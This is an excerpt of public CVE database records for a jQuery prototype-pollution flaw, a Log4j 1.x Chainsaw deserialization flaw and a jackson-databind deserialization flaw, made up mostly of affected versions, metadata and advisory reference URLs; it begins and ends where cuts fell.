"http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { name: "RHBA-2019:1570", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { name: "openSUSE-SU-2019:1872", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "RHSA-2019:2587", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { name: "RHSA-2019:3023", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { name: "RHSA-2019:3024", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "[nifi-commits] 20191113 svn commit: r1869773 - /nifi/site/trunk/security.html", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2019-08", }, { name: "[nifi-commits] 20200123 svn commit: r1873083 - /nifi/site/trunk/security.html", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { name: "[debian-lts-announce] 20200224 [SECURITY] [DLA 2118-1] otrs2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2020-02", }, { name: "[syncope-dev] 20200423 Jquery version on 2.1.x/2.0.x", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { name: "[flink-dev] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-issues] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Commented] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Updated] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Assigned] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200520 [jira] [Closed] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[storm-dev] 20200708 [GitHub] [storm] Crim opened a new pull request #3305: [STORM-3553] Upgrade jQuery from 1.11.1 to 3.5.1", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_transferred", ], url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { tags: [ "x_transferred", ], url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { tags: [ "x_transferred", ], url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/pull/4333", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { tags: [ "x_transferred", ], url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_transferred", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_transferred", ], url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2019-11358", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-20T15:03:16.892088Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-11-15T15:11:23.024Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], descriptions: [ { lang: "en", value: "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2023-08-31T02:06:52.187292", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { url: "https://www.drupal.org/sa-core-2019-006", }, { url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { name: "DSA-4434", tags: [ "vendor-advisory", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { name: "20190421 [SECURITY] [DSA 4434-1] drupal7 security update", tags: [ "mailing-list", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { name: "108023", tags: [ "vdb-entry", ], url: "http://www.securityfocus.com/bid/108023", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao opened a new pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] codecov-io commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG merged pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { name: "[debian-lts-announce] 20190506 [SECURITY] [DLA 1777-1] jquery security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { name: "FEDORA-2019-eba8e44ee6", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { name: "FEDORA-2019-1a3edd7e8a", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { name: "FEDORA-2019-7eaf0bbe7c", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { name: "FEDORA-2019-2a0ce0c58c", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { name: "FEDORA-2019-a06dffab1c", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { name: "FEDORA-2019-f563e66380", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[debian-lts-announce] 20190520 [SECURITY] [DLA 1797-1] drupal7 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { name: "[oss-security] 20190603 Django: CVE-2019-12308 AdminURLFieldWidget XSS (plus patched bundled jQuery for CVE-2019-11358)", tags: [ "mailing-list", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { name: "RHSA-2019:1456", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { name: "DSA-4460", tags: [ "vendor-advisory", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { name: "20190612 [SECURITY] [DSA 4460-1] mediawiki security update", tags: [ "mailing-list", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { name: "openSUSE-SU-2019:1839", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { name: "RHBA-2019:1570", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { name: "openSUSE-SU-2019:1872", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "RHSA-2019:2587", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { name: "RHSA-2019:3023", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { name: "RHSA-2019:3024", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "[nifi-commits] 20191113 svn commit: r1869773 - /nifi/site/trunk/security.html", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { url: "https://www.tenable.com/security/tns-2019-08", }, { name: "[nifi-commits] 20200123 svn commit: r1873083 - /nifi/site/trunk/security.html", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { name: "[debian-lts-announce] 20200224 [SECURITY] [DLA 2118-1] otrs2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { url: "https://www.tenable.com/security/tns-2020-02", }, { name: "[syncope-dev] 20200423 Jquery version on 2.1.x/2.0.x", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { name: "[flink-dev] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-issues] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Commented] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Updated] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Assigned] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200520 [jira] [Closed] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[storm-dev] 20200708 [GitHub] [storm] Crim opened a new pull request #3305: [STORM-3553] Upgrade jQuery from 1.11.1 to 3.5.1", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { url: "https://github.com/jquery/jquery/pull/4333", }, { url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2019-11358", datePublished: "2019-04-19T00:00:00", dateReserved: "2019-04-19T00:00:00", dateUpdated: "2024-11-15T15:11:23.024Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2022-23307
Vulnerability from cvelistv5
Published
2022-01-18 15:25
Modified
2024-08-03 03:36
Severity ?
EPSS score ?
Summary
CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.
References
| ▼ | URL | Tags |
|---|---|---|
| https://logging.apache.org/log4j/1.2/index.html | x_refsource_MISC | |
| https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh | x_refsource_MISC | |
| https://www.oracle.com/security-alerts/cpuapr2022.html | x_refsource_MISC | |
| https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x |
Version: 1.2.1 < unspecified Version: unspecified < |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T03:36:20.396Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x", vendor: "Apache Software Foundation", versions: [ { lessThan: "unspecified", status: "affected", version: "1.2.1", versionType: "custom", }, { lessThanOrEqual: "2.0-alpha1", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "@kingkk", }, ], descriptions: [ { lang: "en", value: "CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.", }, ], metrics: [ { other: { content: { other: "Critical", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-502", description: "CWE-502 Deserialization of Untrusted Data", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:49:30", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { discovery: "UNKNOWN", }, title: " A deserialization flaw in the Chainsaw component of Log4j 1 can lead to malicious code execution.", workarounds: [ { lang: "en", value: "Upgrade to Apache Log4j 2 and Apache Chainsaw 2.1.0.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2022-23307", STATE: "PUBLIC", TITLE: " A deserialization flaw in the Chainsaw component of Log4j 1 can lead to malicious code execution.", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j 1.x", version: { version_data: [ { version_affected: ">=", version_value: "1.2.1", }, { version_affected: "<=", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "@kingkk", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "Critical", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-502 Deserialization of Untrusted Data", }, ], }, ], }, references: { reference_data: [ { name: "https://logging.apache.org/log4j/1.2/index.html", refsource: "MISC", url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", refsource: "MISC", url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Upgrade to Apache Log4j 2 and Apache Chainsaw 2.1.0.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2022-23307", datePublished: "2022-01-18T15:25:23", dateReserved: "2022-01-17T00:00:00", dateUpdated: "2024-08-03T03:36:20.396Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14718
Vulnerability from cvelistv5
Published
2019-01-02 18:00
Modified
2024-08-05 09:38
Severity ?
EPSS score ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.347Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "106601", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/106601", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: 